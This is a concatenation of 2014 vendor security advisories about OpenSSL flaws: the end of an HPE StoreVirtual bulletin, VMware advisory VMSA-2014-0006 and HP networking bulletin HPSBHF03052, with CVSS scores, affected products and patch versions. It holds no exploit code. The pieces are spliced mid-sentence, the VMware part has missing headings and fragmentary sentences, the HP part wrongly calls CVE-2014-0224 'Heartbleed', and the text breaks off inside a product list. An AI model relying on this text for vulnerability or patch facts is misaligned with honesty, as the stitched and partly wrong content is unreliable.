12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5\n - HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2010-5298\n 4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\n 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)\n\n CVE-2014-0076\n 4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2014-0195\n 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0198\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0221\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-0224\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-3470\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-3566\n 3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\n 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2016-0705\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE recommends applying the following software updates to resolve the\nvulnerabilities in the impacted versions of HPE StoreVirtual products running\nHPE LeftHand OS. \n\nLeftHand OS v11.5 - Patches 45019-00 and 45020 \nLeftHand OS v12.0 - Patches 50016-00 and 50017-00 \nLeftHand OS v12.5 - Patch 55016-00 \nLeftHand OS v12.6 - Patch 56002-00 \n\n**Notes:**\n\nThese patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision\nto OpenSSL v1.0.1e 48. \nThese patches migrate Certificate Authority Hashing Algorithm from a weak\nhashing algorithm SHA1 to the stronger hashing algorithm SHA256. Summary\n\n VMware product updates address OpenSSL security vulnerabilities. \n\n2. Relevant Releases\n\n ESXi 5.5 prior to ESXi550-201406401-SG\n\n\n3. \n\n OpenSSL libraries have been updated in multiple products to\n versions 0.9.8za and 1.0.1h in order to resolve multiple security\n issues. \n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n\n has assigned the names CVE-2014-0224, CVE-2014-0198, \n CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to\n these issues. The most important of these issues is \n CVE-2014-0224. \n\n CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to\n be of moderate severity. Exploitation is highly unlikely or is\n mitigated due to the application configuration. \n\n CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL \n Security Advisory (see Reference section below), do not affect\n any VMware products. For readability\n the affected products have been split into 3 tables below, \n based on the different client-server configurations and\n deployment scenarios. Applying these patches to \n affected servers will mitigate the affected clients (See Table 1\n below). can be mitigated by using a secure network such as \n VPN (see Table 2 below). \n \n Clients and servers that are deployed on an isolated network are\n less exposed to CVE-2014-0224 (see Table 3 below). The affected\n products are typically deployed to communicate over the\n management network. \n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected Servers in Table 1 below as these patches become\n available. Patching these servers will remove the ability to\n exploit the vulnerability described in CVE-2014-0224 on both\n clients and servers. VMware recommends customers consider \n applying patches to products listed in Table 2 \u0026 3 as required. \n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n ESXi 5.5 ESXi ESXi550-\n 201406401-SG \n\n Big Data Extensions 1.1 patch pending \n Charge Back Manager 2.6 patch pending \n\n Horizon Workspace Server \n GATEWAY 1.8.1 patch pending \n Horizon Workspace Server \n GATEWAY 1.5 patch pending \n\n Horizon Workspace Server \n DATA 1.8.1 patch pending \n\n Horizon Mirage Edge Gateway 4.4.2 patch pending \n Horizon View 5.3.1 patch pending \n\n Horizon View Feature Pack 5.3 SP2 patch pending \n\n NSX for Multi-Hypervisor 4.1.2 patch pending \n NSX for Multi-Hypervisor 4.0.3 patch pending \n NSX for vSphere 6.0.4 patch pending \n NVP 3.2.2 patch pending \n vCAC 6.0.1 patch pending \n\n vCloud Networking and Security 5.5.2 \t\t patch pending \n vCloud Networking and Security 5.1.2 \t\t patch pending \n\n vFabric Web Server 5.3.4 patch pending \n\n vCHS - DPS-Data Protection 2.0 patch pending \n Service\n\n Table 2\n ========\n Affected clients running a vulnerable version of OpenSSL 0.9.8 \n or 1.0.1 and communicating over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCSA 5.5 patch pending \n vCSA 5.1 patch pending \n vCSA 5.0 patch pending \n\n\n ESXi 5.1 ESXi patch pending \n ESXi 5.0 ESXi patch pending \n\n Workstation 10.0.2 any patch pending \n Workstation 9.0.3 any patch pending \n Fusion 6.x OSX patch pending \n Fusion 5.x OSX patch pending \n Player 10.0.2 any patch pending \n Player 9.0.3 any patch pending \n\n Chargeback Manager 2.5.x patch pending \n\n Horizon Workspace Client for 1.8.1 OSX patch pending \n Mac\n Horizon Workspace Client for 1.5 OSX patch pending \n Mac\n Horizon Workspace Client for 1.8.1 Windows patch pending \n Windows \n Horizon Workspace Client for 1.5 Windows patch pending \n\n OVF Tool 3.5.1 patch pending \n OVF Tool 3.0.1 patch pending \n\n vCenter Operations Manager 5.8.1 patch pending \n\n vCenter Support Assistant 5.5.0 patch pending \n vCenter Support Assistant 5.5.1 patch pending \n \n vCD 5.1.2 patch pending \n vCD 5.1.3 patch pending \n vCD 5.5.1.1 patch pending \n vCenter Site Recovery Manager 5.0.3.1 patch pending \n\n Table 3\n =======\n The following table lists all affected clients running a\n vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating\n over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCenter Server 5.5 any patch pending\n vCenter Server 5.1 any patch pending\n vCenter Server 5.0 any patch pending\n\n Update Manager 5.5 Windows patch pending\n Update Manager 5.1 Windows patch pending\n Update Manager 5.0 Windows patch pending \n\n Config Manager (VCM) 5.6 patch pending \n\n Horizon View Client 5.3.1 patch pending \n Horizon View Client 4.x patch pending\n Horizon Workspace 1.8.1 patch pending \n Horizon Workspace 1.5 patch pending \n \n \n ITBM Standard 1.0.1 patch pending \n ITBM Standard 1.0 patch pending \n \n Studio 2.6.0.0 patch pending \n \n Usage Meter 3.3 patch pending \n vCenter Chargeback Manager 2.6 patch pending \n vCenter Converter Standalone 5.5 patch pending \n vCenter Converter Standalone 5.1 patch pending \n vCD (VCHS) 5.6.2 patch pending \n \n vCenter Site Recovery Manager 5.5.1 patch pending \n vCenter Site Recovery Manager 5.1.1 patch pending\n\n vFabric Application Director 5.2.0 patch pending \n vFabric Application Director 5.0.0 patch pending \n View Client 5.3.1 patch pending \n View Client 4.x patch pending\n VIX API 5.5 patch pending \n VIX API 1.12 patch pending \n \n vMA (Management Assistant) 5.1.0.1 patch pending \n \n\n VMware Data Recovery 2.0.3 patch pending \n \n VMware vSphere CLI 5.5 patch pending \n \n vSphere Replication 5.5.1 patch pending \n vSphere Replication 5.6 patch pending \n vSphere SDK for Perl 5.5 patch pending \n vSphere Storage Appliance 5.5.1 patch pending \n vSphere Storage Appliance 5.1.3 patch pending \n vSphere Support Assistant 5.5.1 patch pending \n vSphere Support Assistant 5.5.0 patch pending\n vSphere Virtual Disk 5.5 patch pending \n Development Kit \n vSphere Virtual Disk 5.1 patch pending \n Development Kit\n vSphere Virtual Disk 5.0 patch pending \n Development Kit\n \n 4. Solution\n\n ESXi 5.5\n ----------------------------\n\n Download:\n https://www.vmware.com/patchmgr/download.portal\n\n Release Notes and Remediation Instructions:\n http://kb.vmware.com/kb/2077359\n\n 5. References\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n \n https://www.openssl.org/news/secadv_20140605.txt\n\n- -----------------------------------------------------------------------\n\n6. Change Log\n\n 2014-06-10 VMSA-2014-0006\n Initial security advisory in conjunction with the release of\n ESXi 5.5 updates on 2014-06-10\n\n- -----------------------------------------------------------------------\n \n7. Contact\n\n E-mail list for product security notifications and announcements:\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n This Security Advisory is posted to the following lists:\n\n security-announce at lists.vmware.com\n bugtraq at securityfocus.com\n fulldisclosure at seclists.org\n\n E-mail: security at vmware.com\n PGP key at: http://kb.vmware.com/kb/1055\n\n VMware Security Advisories\n http://www.vmware.com/security/advisories\n\n VMware Security Response Policy\n https://www.vmware.com/support/policies/security_response.html\n\n VMware Lifecycle Support Phases\n https://www.vmware.com/support/policies/lifecycle.html\n \n Twitter\n https://twitter.com/VMwareSRC\n\n Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04347622\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04347622\nVersion: 2\n\nHPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote\nVulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-06-20\nLast Updated: 2014-11-20\n\nPotential Security Impact: Remote Denial of Service (DoS), code execution,\nunauthorized access, modification of information, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Network\nProducts running OpenSSL. The vulnerabilities could be exploited remotely to\ncreate a Denial of Service (DoS), execute code, allow unauthorized access,\nmodify or disclose information. \n\nReferences:\n\n CVE-2010-5298 (SSRT101561) Remote Denial of Service (DoS) or Modification\nof Information\n CVE-2014-0198 (SSRT101561) Remote Unauthorized Access\n CVE-2014-0224 (SSRT101593) Remote Unauthorized Access or Disclosure of\nInformation\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nNOTE:\n\nAll products listed are impacted by CVE-2014-0224. This is the vulnerability\nknown as \"Heartbleed\". \nHP Intelligent Management Center (iMC) is also impacted by CVE-2014-0198 and\nCVE-2010-5298. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nOn June 5th 2014, OpenSSL.org issued an advisory with several CVE\nvulnerabilities. HP Networking is working to release fixes for these\nvulnerabilities that impact the products in the table below. As fixed\nsoftware is made available, this security bulletin will be updated to show\nthe fixed versions. Until the software fixes are available, HP Networking is\nproviding the following information including possible workarounds to\nmitigate the risks of these vulnerabilities. \n\n Workarounds\n\n HP Networking equipment is typically deployed inside firewalls and access\nto management interfaces and other protocols is more tightly controlled than\nin public environments. \n\n Following the guidelines in the Hardening Comware-based devices can help\nto further reduce man-in-the-middle opportunities:\n\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=\nc03536920\n\n For an HP Networking device acting as an OpenSSL Server, using a patched\nOpenSSL client or non-OpenSSL client eliminates the risk. \n\n Protocol Notes\n\n The following details the protocols that use OpenSSL in Comware v5 and\nComware v7:\n\n - Comware V7:\n\n Server:\n\n FIPS/HTTPS/Load Balancing/Session Initiation Protocol\n\n Client:\n\n Load Balancing/OpenFlow/Session Initiation Protocol/State Machine\nBased Anti-Spoofing/Dynamic DNS\n\n - Comware V5:\n\n Server:\n\n CAPWAP/EAP/SSLVPN\n\n Client:\n\n Dynamic DNS\n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n\n12900 Switch Series\n 12900_7.10.R1109\n12900_7.10.R1005P07\n JG619A HP FF 12910 Switch AC Chassis\nJG621A HP FF 12910 Main Processing Unit\nJG632A HP FF 12916 Switch AC Chassis\nJG634A HP FF 12916 Main Processing Unit\n\n12500.0\n 12500_5.20.R1828P04\n12500_5.20.R1828P04-US\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJC808A HP 12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n12500 (Comware v7)\n 12500_7.10.R7328P03\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJG497A HP 12500 MPU w/Comware V7 OS\nJG782A HP FF 12508E AC Switch Chassis\nJG783A HP FF 12508E DC Switch Chassis\nJG784A HP FF 12518E AC Switch Chassis\nJG785A HP FF 12518E DC Switch Chassis\nJG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n11900 Switch Series\n 11900_7.10.R2111P04\n JG608A HP FF 11908-V Switch Chassis\nJG609A HP FF 11900 Main Processing Unit\n\n10500 Switch Series (Comware v5)\n 10500_5.20.R1208P09 10500_5.20.R1208P09-US\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC614A HP 10500 Main Processing Unit\nJC748A HP 10512 Switch Chassis\nJG375A HP 10500 TAA Main Processing Unit\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\n\n10500 Switch Series (Comware v7)\n 10500_7.10.R2111P04\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC748A HP 10512 Switch Chassis\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\nJG496A HP 10500 Type A MPU w/Comware v7 OS\n\n9500E\n S9500E_5.20.R1828P04\n JC124A HP A9508 Switch Chassis\nJC124B HP 9505 Switch Chassis\nJC125A HP A9512 Switch Chassis\nJC125B HP 9512 Switch Chassis\nJC474A HP A9508-V Switch Chassis\nJC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9512E Routing-Switch Chassis (0235A0G7)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9505E Chassis w/ Fans (0235A38P)\nH3C S9512E Chassis w/ Fans (0235A38R)\n\n7900.0\n 7900_7.10.R2118\n JG682A HP FlexFabric 7904 Switch Chassis\n\n7500 Switch Series\n 7500_5.20.R6708P09\n7500_5.20.R6708P09-US\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T\nJC697A HP A7502 TAA Main Processing Unit\nJC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE\nJC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE\nJC700A HP A7500 384 Gbps TAA Fabric / MPU\nJC701A HP A7510 768 Gbps TAA Fabric / MPU\nJD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports\nJD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports\nJD194A HP 384 Gbps Fabric A7500 Module\nJD194B HP 7500 384Gbps Fabric Module\nJD195A HP 7500 384Gbps Advanced Fabric Module\nJD196A HP 7502 Fabric Module\nJD220A HP 7500 768Gbps Fabric Module\nJD238A HP A7510 Switch Chassis\nJD238B HP 7510 Switch Chassis\nJD239A HP A7506 Switch Chassis\nJD239B HP 7506 Switch Chassis\nJD240A HP A7503 Switch Chassis\nJD240B HP 7503 Switch Chassis\nJD241A HP A7506 Vertical Switch Chassis\nJD241B HP 7506-V Switch Chassis\nJD242A HP A7502 Switch Chassis\nJD242B HP 7502 Switch Chassis\nJD243A HP A7503 Switch Chassis w/1 Fabric Slot\nJD243B HP 7503-S Switch Chassis w/1 Fabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4)\nH3C S7503E Ethernet Switch Chassis with Fan (0235A0G2)\nH3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5)\nH3C S7506E Ethernet Switch Chassis with Fan (0235A0G1)\nH3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3)\nH3C S7510E Ethernet Switch Chassis with Fan (0235A0G0)\nH3C S7502E Chassis w/ fans (0235A29A)\nH3C S7503E Chassis w/ fans (0235A27R)\nH3C S7503E-S Chassis w/ fans (0235A33R)\nH3C S7506E Chassis w/ fans (0235A27Q)\nH3C S7506E-V Chassis w/ fans (0235A27S)\n\nHSR6800\n HSR6800_5.20.R3303P10\nHSR6800_5.20.R3303P10-US\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6800 Russian Version\n HSR6800_5.20.R3303P10.RU\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6602\n HSR6602_5.20.R3303P10\nHSR6602_5.20.R3303P10-US\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\nHSR6602 Russian Version\n HSR6602_5.20.R3303P10.RU\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\n6602.0\n 6602_5.20.R3303P10\n6602_5.20.R3303P10-US\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\n6602 Russian Version\n 6602_5.20.R3303P10.RU\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\nA6600\n 6600.RPE_5.20.R3303P10\n6600.RSE_5.20.R3303P10\n6600.RPE_5.20.R3303P10-US\n6600.RSE_5.20.R3303P10-US\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\nA6600 Russian Version\n 6600.RPE_5.20.R3303P10.RU\n6600.RSE_5.20.R3303P10.RU\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP\n HSR6602_5.20.R3303P10\nHSR6602_5.20.R3303P10-US\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP Russian Version\n HSR6602_5.20.R3303P10.RU\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU\nJG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n5920 Switch Series\n 5900AF-5920AF_7.10.R2311P01\n5900AF-5920AF_7.10.R2311P01-US\n JG296A HP 5920AF-24XG Switch\nJG555A HP 5920AF-24XG TAA Switch\n\n5900 Switch Series\n 5900AF-5920AF_7.10.R2311P01\n5900AF-5920AF_7.10.R2311P01-US\n JC772A HP 5900AF-48XG-4QSFP+ Switch\nJG336A HP 5900AF-48XGT-4QSFP+ Switch\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch\nJG554A HP 5900AF-48XG-4QSFP+ TAA Switch\nJG838A HP FF 5900CP-48XG-4QSFP+ Switch\n\n5830 Switch Series\n 5830_5.20.R1118P09\n5830_5.20.R1118P09-US\n JC691A HP A5830AF-48G Switch w/1 Interface Slot\nJC694A HP A5830AF-96G Switch\nJG316A HP 5830AF-48G TAA Switch w/1 Intf Slot\nJG374A HP 5830AF-96G TAA Switch\n\n5820 Switch Series\n 5800-5820X_5.20.R1808P25\n5800-5820X_5.20.R1808P27-US\n JC102A HP 5820-24XG-SFP+ Switch\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots\nJG219A HP 5820AF-24XG Switch\nJG243A HP 5820-24XG-SFP+ TAA-compliant Switch\nJG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L)\nH3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T\n(RJ45) (0235A370)\n\n5800 Switch Series\n 5800-5820X_5.20.R1808P25\n5800-5820X_5.20.R1808P27-US\n JC099A HP 5800-24G-PoE Switch\nJC100A HP 5800-24G Switch\nJC101A HP 5800-48G Switch with 2 Slots\nJC103A HP 5800-24G-SFP Switch\nJC104A HP 5800-48G-PoE Switch\nJC105A HP 5800-48G Switch\nJG225A HP 5800AF-48G Switch\nJG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots\nJG254A HP 5800-24G-PoE+ TAA-compliant Switch\nJG255A HP 5800-24G TAA-compliant Switch\nJG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt\nJG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot\nJG258A HP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U)\nH3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X\n(SFP Plus ) Plus 1 media module PoE (0235A36S)\nH3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus\nmedia module (no power) (0235A374)\nH3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus\n) Plus media module (0235A379)\nH3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module\n(0235A378)\nH3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n\n5500 HI Switch Series\n 